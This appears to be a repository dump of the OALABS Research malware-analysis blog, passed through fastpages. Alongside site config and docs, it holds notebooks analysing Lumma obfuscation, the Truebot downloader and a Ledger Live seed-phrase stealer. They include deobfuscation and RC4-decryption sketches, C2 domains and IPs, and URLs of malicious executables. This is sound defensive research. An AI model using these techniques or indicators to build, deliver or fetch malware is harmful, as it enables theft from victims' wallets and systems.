29 | Please use the [nbdev & blogging channel](https://forums.fast.ai/c/fastai-users/nbdev/48) in the fastai forums for any questions or feature requests.
30 |
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | # Welcome to Jekyll!
2 | #
3 | # This config file is meant for settings that affect your whole blog.
4 | #
5 | # If you need help with YAML syntax, here are some quick references for you:
6 | # https://learn-the-web.algonquindesign.ca/topics/markdown-yaml-cheat-sheet/#yaml
7 | # https://learnxinyminutes.com/docs/yaml/
8 |
9 | title: OALABS Research
10 | description:
11 | github_username: OALabs
12 | # you can comment out the line below if your repo name is the same as your baseurl
13 | github_repo: "research"
14 |
15 | # OPTIONAL: override baseurl and url if using a custom domain
16 | # Note: leave out the trailing / from this value.
17 | url: "https://research.openanalysis.net" # the base hostname & protocol for your site, e.g. http://example.com
18 |
19 | ###########################################################
20 | ######### Special Instructions for baseurl ###############
21 | #
22 | #### Scenario One: If you do not have a Custom Domain #####
23 | # - if you are not using a custom domain, the baseurl *must* be set to your repo name
24 | #
25 | #### Scenario Two: If you have a Custom Domain #####
26 | # 1. If your domain does NOT have a subpath, leave this value as ""
27 | # 2. If your domain does have a subpath, you must precede the value with a / and NOT have a / at the end.
28 | # For example:
29 | # "" is valid
30 | # "/blog" is valid
31 | # "/blog/site/" is invalid ( / at the end)
32 | # "/blog/site" is valid
33 | # "blog/site" is invalid (because it doesn't begin with a /)
34 | #
35 | # 3. You must replace the parameter `baseurl` in _action_files/settings.ini with the same value as you set here but WITHOUT QUOTES.
36 | #
37 | baseurl: "" # the subpath of your site, e.g. "/blog".
38 |
39 | # Github and twitter are optional:
40 | minima:
41 | social_links:
42 |
43 |
44 | # Set this to true to get LaTeX math equation support
45 | use_math:
46 |
47 | # Set this to true to display the summary of your blog post under your title on the Home page.
48 | show_description: true
49 |
50 | # Set this to true to display image previews on home page, if they exist
51 | show_image: false
52 |
53 | # Set this to true to turn on annotations with hypothes.is (https://web.hypothes.is/)
54 | annotations: false
55 |
56 | # Set this to true to display tags on each post
57 | show_tags: true
58 |
59 | # Add your Google Analytics ID here if you have one and want to use it
60 | google_analytics:
61 |
62 | exclude:
63 | - docker-compose.yml
64 | - action.yml
65 | - Makefile
66 | - settings.ini
66 |
67 | # this setting allows you to keep pages organized in the _pages folder
68 | include:
69 | - _pages
70 |
71 | # This specifies what badges are turned on by default for notebook posts.
72 | default_badges:
73 | github: true
74 | binder: false
75 | colab: false
76 | deepnote: false
77 |
78 | # Escape HTML in post descriptions
79 | html_escape:
80 | description: false
81 |
82 | # Everything below here should be left alone. Modifications may break fastpages
83 | future: true
84 | theme: minima
85 | plugins:
86 | - jekyll-feed
87 | - jekyll-gist
88 | - jekyll-octicons
89 | - jekyll-toc
90 | - jekyll-twitter-plugin
91 | - jekyll-relative-links
92 | - jekyll-seo-tag
93 | - jekyll-remote-theme
94 | - jekyll-paginate
95 | - jekyll-sitemap
96 | - jemoji
97 |
98 | # See https://jekyllrb.com/docs/pagination/
99 | # For pagination to work, you cannot have index.md at the root of your repo; instead, you must rename this file to index.html
100 | paginate: 15
101 | paginate_path: /page:num/
102 |
103 | remote_theme: jekyll/minima@69664442e5a45f631d5bccaba6d7978a91ce22c8
104 |
105 | titles_from_headings:
106 | enabled: true
107 | strip_title: true
108 | collections: true
109 |
110 | highlighter: rouge
111 | markdown: kramdown
112 | kramdown:
113 | math_engine: katex
114 | input: GFM
115 | auto_ids: true
116 | hard_wrap: false
117 | syntax_highlighter: rouge
118 |
119 | # to limit size of xml as it can grow quite large.
120 | feed:
121 | posts_limit: 5 #default posts_limit: 10
122 | excerpt_only: true
123 | disable: true
124 |
127 |
--------------------------------------------------------------------------------
/_notebooks/2024-04-07-lumma-cff.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# Lumma Stealer Obfuscation\n",
8 | "> Taking a look at obfuscation in the latest version of lumma\n",
9 | "\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [lumma,obfuscation,cff,ida]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "metadata": {},
18 | "source": [
19 | "## Overview\n",
20 | "\n",
21 | "[Lumma](https://telegra.ph/LummaC2---universal-stealer-a-malware-for-professionals-07-27) has been around for a [while](https://www.esentire.com/blog/the-case-of-lummac2-v4-0), initially starting out with plaintext strings and simple-to-reverse code, but as it has evolved the developers have added some [control flow flattening](https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/#h-control-flow-flattening) (CFF) and string encryption. The latest build adds more obfuscation, introducing opaque predicates into the CFF. We are going to attempt to use IDA scripting to remove this obfuscation.\n",
22 | "\n",
23 | "## Sample\n",
24 | "`18a065b740da441c636bce23fd72fc0f68e935956131973f15bf4918e317bf03` [[UnpacMe](https://www.unpac.me/results/41d8f31a-3b36-4b77-8b7c-a2d7a81a7034#/)]\n"
25 | ]
26 | },
27 | {
28 | "cell_type": "code",
29 | "execution_count": null,
30 | "metadata": {
31 | "vscode": {
32 | "languageId": "plaintext"
33 | }
34 | },
35 | "outputs": [],
36 | "source": []
37 | },
38 | {
39 | "cell_type": "markdown",
40 | "metadata": {},
41 | "source": [
42 | "## Analysis\n",
43 | "\n",
44 | "The opaque predicates are set up using a jump table with encrypted addresses. For direct jumps the address is simply moved into a register, decrypted, then jumped to. For conditional jumps the jump table is indexed to locate the correct address, which is then decrypted and jumped to.\n",
45 | "\n",
46 | "```\n",
47 | "00433500 mov eax, dword_4426C0\n",
48 | "00433505 mov ecx, 439EAE97h\n",
49 | "0043350A xor ecx, dword_4426C8\n",
50 | "00433510 add eax, ecx\n",
51 | "00433512 inc eax\n",
52 | "00433513 jmp eax\n",
53 | "\n",
54 | "0043351C mov eax, dword_442714\n",
55 | "00433521 mov ecx, 0DEA4552Dh\n",
56 | "00433526 xor ecx, dword_442718\n",
57 | "0043352C add eax, ecx\n",
58 | "0043352E inc eax\n",
59 | "0043352F nop\n",
60 | "00433530 jmp eax\n",
61 | "\n",
62 | "00433399 movzx eax, al\n",
63 | "0043339C mov eax, dword_4426D4[eax*4]\n",
64 | "004333A3 mov ecx, 42CEBA5h\n",
65 | "004333A8 xor ecx, dword_4426DC\n",
66 | "004333AE add eax, ecx\n",
67 | "004333B0 inc eax\n",
68 | "004333B1 jmp eax\n",
69 | "\n",
70 | "00433312 test eax, eax\n",
71 | "00433314 setz cl\n",
72 | "00433317 mov ecx, dword_4426A0[ecx*4]\n",
73 | "0043331E mov edx, 0AD7AC4AAh\n",
74 | "00433323 xor edx, dword_4426A8\n",
75 | "00433329 add ecx, edx\n",
76 | "0043332B inc ecx\n",
77 | "0043332C jmp ecx\n",
78 | "```\n",
79 | "\n",
80 | "### Algorithm\n",
81 | "- Linear disassembly \n",
82 | "- Track memory moves to regs from jump table memory locations `.data`\n",
83 | "- Reset memory tracking for control flow operations JMP,CALL,RET\n",
84 | "- When we hit a JMP to a register, use the tracked memory location as the emulation start and emulate to recover the jump address\n",
85 | "- For conditional jumps, emulate both values of the jump table index register (0 and 1)\n",
86 | "- Patch the jumps; for conditionals, test the index register and patch in a conditional jump (a rough sketch of the jump-target arithmetic is shown below)\n",
87 | "\n",
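"As a rough illustration of the jump-target recovery (not the final script), the arithmetic in the listings above reduces to `target = table[index] + (imm ^ key_dword) + 1`. Below is a minimal IDAPython sketch of just that arithmetic, using the addresses from the first and last listings; the full approach described above would drive this from emulation, and anything beyond the listed addresses is an assumption:\n",
"\n",
"```python\n",
"import idc  # run inside IDA on the unpacked sample\n",
"\n",
"def resolve_jump(slot_ea, key_ea, imm, index=0):\n",
"    # table slot (optionally indexed for conditional jumps) + (imm xor key dword) + 1\n",
"    slot = idc.get_wide_dword(slot_ea + 4 * index)\n",
"    key = idc.get_wide_dword(key_ea)\n",
"    return (slot + (imm ^ key) + 1) & 0xFFFFFFFF\n",
"\n",
"# direct jump at 0x433500: slot dword_4426C0, key dword_4426C8, imm 0x439EAE97\n",
"print(hex(resolve_jump(0x4426C0, 0x4426C8, 0x439EAE97)))\n",
"\n",
"# conditional jump at 0x433312: resolve both sides of the setz index\n",
"print(hex(resolve_jump(0x4426A0, 0x4426A8, 0xAD7AC4AA, index=0)))\n",
"print(hex(resolve_jump(0x4426A0, 0x4426A8, 0xAD7AC4AA, index=1)))\n",
"```\n",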
88 | "**TO BE CONTINUED....**\n"
89 | ]
90 | },
91 | {
92 | "cell_type": "markdown",
93 | "metadata": {},
94 | "source": []
95 | }
96 | ],
97 | "metadata": {
98 | "language_info": {
99 | "name": "python"
100 | }
101 | },
102 | "nbformat": 4,
103 | "nbformat_minor": 2
104 | }
105 |
--------------------------------------------------------------------------------
/_layouts/post.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: default
3 | ---
4 |
5 |
6 |
7 |
{{ page.title | escape }}
8 | {%- if page.description -%}
9 | {%- if site.html_escape.description -%}
10 |
81 | {%- if page.comments -%}
82 | {%- include utterances.html -%}
83 | {%- endif -%}
84 | {%- if site.disqus.shortname -%}
85 | {%- include disqus_comments.html -%}
86 | {%- endif -%}
87 |
88 |
89 |
--------------------------------------------------------------------------------
/_fastpages_docs/DEVELOPMENT.md:
--------------------------------------------------------------------------------
1 | # Development Guide
2 | - [Seeing All Commands In The Terminal](#seeing-all-commands-in-the-terminal)
3 | - [Basic usage: viewing your blog](#basic-usage-viewing-your-blog)
4 | - [Converting the pages locally](#converting-the-pages-locally)
5 | - [Visual Studio Code integration](#visual-studio-code-integration)
6 | - [Advanced usage](#advanced-usage)
7 | - [Rebuild all the containers](#rebuild-all-the-containers)
8 | - [Removing all the containers](#removing-all-the-containers)
9 | - [Attaching a shell to a container](#attaching-a-shell-to-a-container)
10 |
11 | You can run your fastpages blog on your local machine, and view any changes you make to your posts, including Jupyter Notebooks and Word documents, live.
12 | The live preview requires that you have Docker installed on your machine. [Follow the instructions on this page if you need to install Docker.](https://www.docker.com/products/docker-desktop)
13 |
14 | ## Seeing All Commands In The Terminal
15 |
16 | There are many different `docker-compose` commands that are necessary to manage the lifecycle of the fastpages Docker containers. To make this easier, we aliased common commands in a [Makefile](https://www.gnu.org/software/make/manual/html_node/Introduction.html).
17 |
18 | You can quickly see all available commands by running this command in the root of your repository:
19 |
20 | `make`
21 |
22 | ## Basic usage: viewing your blog
23 |
24 | All of the commands in this block assume that you're in your blog root directory.
25 | To run the blog with live preview:
26 |
27 | ```bash
28 | make server
29 | ```
30 |
31 | When you run this command for the first time, it'll build the required Docker images, and the process might take a couple minutes.
32 |
33 | This command will build all the necessary containers and run the following services:
34 | 1. A service that monitors any changes in `./_notebooks/*.ipynb` and `./_word/*.docx;*.doc` and rebuilds the blog on change.
35 | 2. A Jekyll server on http://127.0.0.1:4000 that you can use to preview your blog.
36 |
37 | The services will output to your terminal. If you close the terminal or hit `Ctrl-C`, the services will stop.
38 | If you want to run the services in the background:
39 |
40 | ```bash
41 | # run all services in the background
42 | make server-detached
43 |
44 | # stop the services
45 | make stop
46 | ```
47 |
48 | If the services are running in the background and you need to restart just the Jekyll server, run `make restart-jekyll`.
49 |
50 | _Note that the blog won't autoreload on change, you'll have to refresh your browser manually._
51 |
52 | **If containers won't start**: try `make build` first; this rebuilds all the containers from scratch and should fix the majority of update problems.
53 |
54 | ## Converting the pages locally
55 |
56 | If you just want to convert your notebooks and word documents to `.md` posts in `_posts`, this command will do it for you:
57 |
58 | ```bash
59 | make convert
60 | ```
61 |
62 | You can launch just the jekyll server with `make server`.
63 |
64 | ## Visual Studio Code integration
65 |
66 | If you're using VSCode with the Docker extension, you can run these containers from the sidebar: `fastpages_watcher_1` and `fastpages_jekyll_1`.
67 | The containers will only show up in the list after you run or build them for the first time. So if they're not in the list — try `make build` in the console.
68 |
69 | ## Advanced usage
70 |
71 | ### Rebuild all the containers
72 | If you changed files in `_action_files` directory, you might need to rebuild the containers manually, without cache.
73 |
74 | ```bash
75 | make build
76 | ```
77 |
78 | ### Removing all the containers
79 | Want to start from scratch and remove all the containers?
80 |
81 | ```
82 | make remove
83 | ```
84 |
85 | ### Attaching a shell to a container
86 | You can attach a terminal to a running service:
87 |
88 | ```bash
89 |
90 | # If the container is already running:
91 |
92 | # attach to a bash shell in the jekyll service
93 | make bash-jekyll
94 |
95 | # attach to a bash shell in the watcher service.
96 | make bash-nb
97 | ```
98 |
99 | _Note: you can use `docker-compose run` instead of `make bash-nb` or `make bash-jekyll` to start a service and then attach to it.
100 | Or you can run all your services in the background, `make server-detached`, and then use `make bash-nb` or `make bash-jekyll` as in the examples above._
101 |
102 |
--------------------------------------------------------------------------------
/_notebooks/2023-07-13-truebot.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "342ed7fc-d919-47f4-be62-2d33e458f872",
6 | "metadata": {},
7 | "source": [
8 | "# Truebot\n",
9 | "> Truely a simple malware leading to ransomware\n",
10 | "> Truly a simple malware leading to ransomware\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [truebot,config,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "45880ffe-5309-4602-bf7e-369a8ae3768f",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Truebot (aka Silence) is primarily a downloader associated with the threat actor group [TA505](https://malpedia.caad.fkie.fraunhofer.de/actor/ta505). Recently there was a CISA alert [Increased Truebot Activity Infects U.S. and Canada Based Networks](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a) which described ransomware/extortion activity associated with the use of Truebot.\n",
24 | "\n",
25 | "### References\n",
26 | "- [Increased Truebot Activity Infects U.S. and Canada Based Networks](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a) \n",
27 | "- [TrueBot Analysis Part III - Capabilities](https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html)\n",
28 | "- [10445155.r1.v1 (pdf)](https://www.cisa.gov/sites/default/files/2023-07/MAR-10445155.r1.v1.CLEAR_.pdf)\n",
29 | "- [A Truly Graceful Wipe Out](https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/)\n",
30 | "\n",
31 | "### Samples\n",
32 | "- [717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb](https://www.unpac.me/results/8d1eb4c3-cbb0-4b32-8d52-6f142c836d0f?hash=717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb#/)"
33 | ]
34 | },
35 | {
36 | "cell_type": "markdown",
37 | "id": "40019d1c-7c62-412b-bc5b-eff15ec576d2",
38 | "metadata": {},
39 | "source": [
40 | "## Analysis\n",
41 | "\n",
42 | "- The binary uses an Adobe PDF icon possibly to trick victims into clicking it. It also displays a fake error message. `\"There was an error opening this document. The file is damaged and could not be repaired. Adobe Acrobat\"`\n",
43 | "- The binary is padded with a significant amount of junk code that is not relevant to its operation. \n",
44 | "- The main code has some checks for debugging tools and AV which, if detected, cause the malware to execute a decoy process (calc.exe)\n",
45 | "- There are multiple anti-emulation techniques used including ...\n",
46 | " - Reading from a fake named pipe\n",
47 | " - Calling EraseTape\n",
48 | " - Checking for a valid code page with GetACP\n",
49 | " - Loading `user32`\n",
50 | " - Trying to open a random invalid file\n",
51 | "- The C2 host and URL path are encrypted using base64, urldecode, and RC4 with a hard coded key (a decryption sketch is shown after this list)\n",
52 | " - `essadonio.com`\n",
53 | " - `/538332[.]php`\n",
54 | "- A hard coded mutex `OrionStartWorld#666` is used to ensure only one copy of the malware is running \n",
55 | "- A GUID is generated for the victim and stored in a randomly named file with the extension `.JSONMSDN` in the `%APPDATA%` directory. This GUID is also used in the C2 communications.\n",
56 | "- A list of processes running on the host is collected and combined with the GUID. It is base64 encoded then sent to the C2 server in a POST request.\n",
57 | "- The C2 has the option of sending the following commands\n",
58 | " - **LSEL** - delete yourself and exit\n",
59 | " - **TFOUN** - array of commands\n",
60 | " - **EFE** - download payload, decrypt with RC4 (hard coded key), and execute PE\n",
61 | " - **S66** - download, decrypt with RC4 (hard coded key), and inject shellcode into `cmd.exe`\n",
62 | " - **Z66** - download, decrypt with RC4 (hard coded key), and run shellcode\n",
63 | "\n",
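"The decryption layering described above (base64, URL decoding, and RC4 with a hard-coded key) can be reproduced in a few lines of Python. The key is not reproduced in these notes, so the `key` argument below is a placeholder, and the decode order is an assumption based on the bullet above:\n",
"\n",
"```python\n",
"import base64\n",
"from urllib.parse import unquote_to_bytes\n",
"\n",
"def rc4(key: bytes, data: bytes) -> bytes:\n",
"    # standard RC4 KSA + PRGA\n",
"    S = list(range(256))\n",
"    j = 0\n",
"    for i in range(256):\n",
"        j = (j + S[i] + key[i % len(key)]) & 0xFF\n",
"        S[i], S[j] = S[j], S[i]\n",
"    out, i, j = bytearray(), 0, 0\n",
"    for byte in data:\n",
"        i = (i + 1) & 0xFF\n",
"        j = (j + S[i]) & 0xFF\n",
"        S[i], S[j] = S[j], S[i]\n",
"        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])\n",
"    return bytes(out)\n",
"\n",
"def decrypt_c2_string(blob_b64: str, key: bytes) -> str:\n",
"    # base64 decode -> URL decode -> RC4, per the layering described above\n",
"    return rc4(key, unquote_to_bytes(base64.b64decode(blob_b64))).decode('latin-1')\n",
"```\n",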
64 | "\n"
65 | ]
66 | },
67 | {
68 | "cell_type": "code",
69 | "execution_count": null,
70 | "id": "20e99156-df59-471a-8973-70e02fd7e3de",
71 | "metadata": {},
72 | "outputs": [],
73 | "source": []
74 | }
75 | ],
76 | "metadata": {
77 | "kernelspec": {
78 | "display_name": "Python 3",
79 | "language": "python",
80 | "name": "python3"
81 | },
82 | "language_info": {
83 | "codemirror_mode": {
84 | "name": "ipython",
85 | "version": 3
86 | },
87 | "file_extension": ".py",
88 | "mimetype": "text/x-python",
89 | "name": "python",
90 | "nbconvert_exporter": "python",
91 | "pygments_lexer": "ipython3",
92 | "version": "3.9.5"
93 | }
94 | },
95 | "nbformat": 4,
96 | "nbformat_minor": 5
97 | }
98 |
--------------------------------------------------------------------------------
/_fastpages_docs/UPGRADE.md:
--------------------------------------------------------------------------------
1 | # Upgrading fastpages
2 |
3 |
4 |
5 | - [Automated Upgrade](#automated-upgrade)
6 | - [Step 1: Open An Issue With The Upgrade Template.](#step-1-open-an-issue-with-the-upgrade-template)
7 | - [Step 2: Click `Submit new issue`](#step-2-click-submit-new-issue)
8 | - [Step 3: A Link to Pull Request Will Appear](#step-3-a-link-to-pull-request-will-appear)
9 | - [Step 4: Review & Merge PR](#step-4-review-merge-pr)
10 | - [Manual Upgrade](#manual-upgrade)
11 | - [Easy Way (Recommended)](#easy-way-recommended)
12 | - [Advanced](#advanced)
13 | - [Additional Resources](#additional-resources)
14 |
15 |
16 |
17 | **For fastpages repos that are older than December 1st, 2020 the only way to upgrade is to create a brand-new fastpages repo and copy your blog post files into it.** This is because of breaking changes that were made to GitHub Actions around that time.
18 |
19 | There are two ways to upgrade fastpages. One is an automated way that assumes you have made no changes to the HTML of your site. Alternatively, you may [upgrade manually](#manual-upgrade) and determine which changes to accept or reject. For most people we recommend upgrading fastpages automatically.
20 |
21 | ## Automated Upgrade
22 |
23 | - This method is appropriate for those who have not customized the HTML of their site.
24 | - **If you are unsure, try the Automated approach and review which files are changed in the automated PR** to see if this is appropriate for you.
25 |
26 | ### Step 1: Open An Issue With The Upgrade Template.
27 |
28 | - Open a new issue in your repository, and push the "Get Started" button for the `[fastpages] Automated Upgrade` Issue template, which looks like this:
29 | - **IF YOU DON'T SEE THIS**: you have an older version of fastpages and you **must [manually upgrade](#manual-upgrade) once** to get this new functionality.
30 |
31 | 
32 |
33 | ### Step 2: Click `Submit new issue`
34 |
35 | - Be careful not to change anything before clicking the button.
36 |
37 | 
38 |
39 | ### Step 3: A Link to Pull Request Will Appear
40 |
41 | - This issue will trigger GitHub to open a PR making changes to your repository for the upgrade to take place. A comment with the link to the PR will be made in the issue, and will look like this:
42 |
43 | 
44 |
45 | It is possible that you might receive an error message instead of this comment. You can follow the instructions in the comment to troubleshoot the issue. Common reasons for receiving an error are:
46 |
47 | - You are up to date, therefore no upgrade is possible. You will see an error that there is "nothing to commit".
48 | - You already have a PR from a previous upgrade open that you never merged.
49 |
50 | Please [ask on the forums](https://forums.fast.ai/) if you encounter another problem that is unclear.
51 |
52 | ### Step 4: Review & Merge PR
53 |
54 | - Ensure that you read the instructions in the PR carefully. Furthermore, carefully review which files will be changed to determine if this interferes with any customizations you have made to your site. When ready, select `Merge pull request`.
55 | - If the PR is making undesired changes to files you can use the manual upgrade approach instead.
56 |
57 | ## Manual Upgrade
58 |
59 | ### Easy Way (Recommended)
60 |
61 | Create a new repo with the current `fastpages` template by following the [setup instructions](https://github.com/fastai/fastpages#setup-instructions) in the README, and copy all of your blog posts from `_notebooks`, `_word`, and `_posts` into the new template. This is very similar to what the automated process is doing.
62 |
63 | ### Advanced
64 |
65 | - This method is appropriate for those who made customizations to the HTML of fastpages.
66 | - You must proceed with caution, as new versions of fastpages may not be compatible with your customizations.
67 | - You can use git to perform the upgrade by [following this approach](https://stackoverflow.com/questions/56577184/github-pull-changes-from-a-template-repository/56577320) instead. A step-by-step companion to this stack overflow post with screenshots is [written up here](https://github.com/fastai/fastpages/issues/163#issuecomment-593766189).
68 | - Be careful to not duplicate files, as files in fastpages have been reorganized several times.
69 |
70 |
71 | ## Additional Resources
72 |
73 | - [This Actions workflow](/.github/workflows/upgrade.yaml) defines the automated upgrade process.
74 | - You can get more help with upgrading in the [fastai forums - nbdev & blogging category](https://forums.fast.ai/c/fastai-users/nbdev/48).
75 |
--------------------------------------------------------------------------------
/assets/badges/deepnote.svg:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/_notebooks/2023-11-05-live-ledger.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "36177e8d-9cb6-4215-998b-797986e72628",
6 | "metadata": {},
7 | "source": [
8 | "# Ledger Live Crypto Wallet Attack\n",
9 | "> A Targeted Malware Crypto Stealer\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [live ledger,dotnet,crypto,wallet,stealer]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "94e9cb50-f453-442c-9000-66dfa8494c0b",
19 | "metadata": {},
20 | "source": [
21 | "# Overview\n",
22 | "\n",
23 | "This is a unique looking crypto stealer that appears to have been built custom to target a hardware wallet.\n",
24 | "\n",
25 | "## Sample\n",
26 | "\n",
27 | "- `3333e2846173468a7bf9dc859e2a0418a4bf1a2840802b397463fce5398fb6d3` [UnpacMe](https://www.unpac.me/results/d6205802-3b81-4ec5-9685-103bbcfe386f)\n",
28 | "\n",
29 | "## References \n",
30 | "- [Ledger Live is your one-stop shop to buy crypto, grow your assets, and manage NFTs. Join 6+ million people who trust Ledger for everything web3.](https://www.ledger.com/ledger-live)\n",
31 | "\n"
32 | ]
33 | },
34 | {
35 | "cell_type": "markdown",
36 | "id": "54e44f88-6eed-486e-946c-1ad4afba6640",
37 | "metadata": {},
38 | "source": [
39 | "## Analysis\n",
40 | "- Sample is .NET\n",
41 | "- The sample name is `Ledger Lives.exe` which is possibly an attempt to mimic the wallet\n",
42 | "- The following PDB path is used `C:\\Users\\Kernel32\\source\\repos\\Ledger Lives\\Ledger Lives\\obj\\Release\\Ledger Lives.pdb`\n",
43 | "- Persistence via the runkey `\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run` using the name `Realter HD Audio`\n",
44 | "- Can take screenshot (saved to `screen.png`) -- currently unused \n",
45 | "- There is no mechanism to prevent multiple versions of the malware from running (no mutex)\n",
46 | "\n",
47 | "### C2\n",
48 | "- `94.142.138.148` port `8080`\n",
49 | "\n",
50 | "\n",
51 | "### Wallet Attack\n",
52 | "- Uses a process watch thread to identify when the process `Ledger Live` is launched\n",
53 | "- The real Ledger process is killed and a message box indicating an error is popped up `Firmware verification error, emergency restart`\n",
54 | "\n",
55 | "\n",
56 | "\n",
57 | "- The App uses a fake Live Ledger recover screen to trick the user into plugging in their wallet USB (not required for the attack)\n",
58 | "- The following WMI query is used to wait for the USB to be plugged in `SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA 'Win32_PnPEntity'`\n",
59 | " - This does not require a Live Ledger USB to be connected, any USB will trigger the query\n",
60 | "- Once the USB is attached the app tricks the user into entering their secret recovery phrase \n",
61 | "\n",
62 | "\n",
63 | "\n",
64 | "- This is then sent to the C2\n",
65 | " \n",
66 | "## Delivery \n",
67 | "According to UnpacMe SourceIntel the sample was downloaded from a (likely compromised) WordPress directory `https://whitecatcorn.com/wp-content/themes/valerielite/13.exe`. According to OSINT from [URLHaus](https://urlhaus.abuse.ch/url/2725945/) LummaStealer was also downloaded from the same WordPress directory ` https://whitecatcorn.com/wp-content/themes/valerielite/updates_installer.exe` hash `9648c6034468d7ee150c2b9b2ce088c14793e1ddf235d596ce14ef754e7d1e9f`. \n",
68 | "\n",
69 | "It is possible that that LummaStealer operator observed evidence of Live Ledger on a victim and then deployed this targeted Live Ledger Stealer. The stealer shows signs of hasty development (spelling errors, unimplemented features, lack of error checking, etc.). This coupled with the the lack of a mutex suggest that the malware was developed for a specific use case, and possibly a specific target.\n",
70 | "\n"
71 | ]
72 | },
73 | {
74 | "cell_type": "code",
75 | "execution_count": null,
76 | "id": "adea48e5-dc9f-49f9-80b1-4958625705c1",
77 | "metadata": {},
78 | "outputs": [],
79 | "source": []
80 | }
81 | ],
82 | "metadata": {
83 | "kernelspec": {
84 | "display_name": "Python 3",
85 | "language": "python",
86 | "name": "python3"
87 | },
88 | "language_info": {
89 | "codemirror_mode": {
90 | "name": "ipython",
91 | "version": 3
92 | },
93 | "file_extension": ".py",
94 | "mimetype": "text/x-python",
95 | "name": "python",
96 | "nbconvert_exporter": "python",
97 | "pygments_lexer": "ipython3",
98 | "version": "3.9.5"
99 | }
100 | },
101 | "nbformat": 4,
102 | "nbformat_minor": 5
103 | }
104 |
--------------------------------------------------------------------------------
/_fastpages_docs/TROUBLESHOOTING.md:
--------------------------------------------------------------------------------
1 | # Filing Bugs & Troubleshooting
2 |
3 | These are the required prerequisites before filing an issue on GitHub or on the [fastai forums](https://forums.fast.ai/).
4 |
5 | ## Step 1: Attempt To Upgrade fastpages
6 |
7 | See the [Upgrading guide](https://github.com/fastai/fastpages/blob/master/_fastpages_docs/UPGRADE.md).
8 |
9 | **In addition to upgrading**, if developing locally, refresh your Docker containers with the following commands from the root of your repo:
10 |
11 | `make remove` followed by `make build`
12 |
13 | ## Step 2: Search Relevant Places For Similar Issues
14 |
15 | - [ ] Search the [fastai forums](https://forums.fast.ai/) for similar problems.
16 | - [ ] Search issues on the [fastpages repo](https://github.com/fastai/fastpages/) for similar problems.
17 | - [ ] Read the [README of the repo](https://github.com/fastai/fastpages/blob/master/README.md) carefully
18 |
19 |
20 | ## Step 3: Observe Build Logs When Developing Locally
21 |
22 | - [ ] Run the [fastpages blog server locally](DEVELOPMENT.md)
23 | - Pay attention to the emitted logs when you save your notebooks or files. Often, you will see errors here that will give you important clues.
24 | - [ ] When developing locally, you will notice that Jupyter notebooks are converted to corresponding markdown files in the `_posts` folder. Take a look at the problematic blog posts and see if you can spot the offending HTML or markdown in that code.
25 | - Use your browser's developer tools to see if there are any errors. Common errors are (1) not able to find images because they have not been saved into the right folder, (2) javascript or other errors.
26 | - If you receive a Jekyll build error or a Liquid error, search for this error on Stack Overflow to gain more insight into the problem.
27 |
28 | ## Step 4: See if there are errors in the build process of GitHub Actions.
29 |
30 | - [ ] In your GitHub repository, you will have a tab called **Actions**. To find build errors, click on the `Event` dropdown list and select `push`. Browse through the logs to see if you can find an error. If you find one, read the error message and try to debug.
31 |
32 | ## Step 5: Once you have performed all the above steps, post your issue in the fastai forums or a GitHub Issue.
33 |
34 | - [ ] Use the [nbdev & blogging category](https://forums.fast.ai/c/fastai-users/nbdev/48) to describe your problem if posting on the fastai forums.
35 | - [ ] If you cannot find a similar issue create a new thread instead of commenting on an unrelated one.
36 | - When reporting a bug, provide this information:
37 |
38 | 1. Steps to reproduce the problem
39 | 2. **A link to the notebook or markdown file** where the error is occurring
40 | 3. If the error is happening in GitHub Actions, a link to the specific error along with how you are able to reproduce this error. You must provide this **in addition to the link to the notebook or markdown file**.
41 | 4. A screenshot / dump of relevant logs or error messages you are receiving from your local development environment, i.e. the local development server described in the [development guide](https://github.com/fastai/fastpages/blob/master/_fastpages_docs/DEVELOPMENT.md).
42 |
43 |
44 | **You must provide ALL of the above information**.
45 |
46 | # Frequent Errors
47 |
48 | 1. Malformed front matter. Note that anything defined in front matter must be valid YAML. **Failure to provide valid YAML could result in your page not rendering** in your blog. For example, if you want a colon in your title you must escape it with double quotes like this:
49 |
50 | ` - title: "Deep learning: A tutorial"`
51 |
52 | or in a notebook
53 |
54 | `# "Deep learning: A tutorial"`
55 |
56 | See this [tutorial on YAML](https://rollout.io/blog/yaml-tutorial-everything-you-need-get-started/) for more information.
57 |
58 | **Colons, tildes, asterisks and other special characters may cause your front matter to break and your posts to not render.** If you violate these conventions you often get an error that looks something like this:
59 |
60 | ```bash
61 | Error: YAML Exception reading ... (): mapping values are not allowed
62 | ```
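
A quick way to check whether a piece of front matter is valid YAML is a couple of lines of Python (a minimal sketch, assuming PyYAML is installed):

```python
import yaml

good = 'title: "Deep learning: A tutorial"'
bad = 'title: Deep learning: A tutorial'

for front_matter in (good, bad):
    try:
        print(yaml.safe_load(front_matter))
    except yaml.YAMLError as e:
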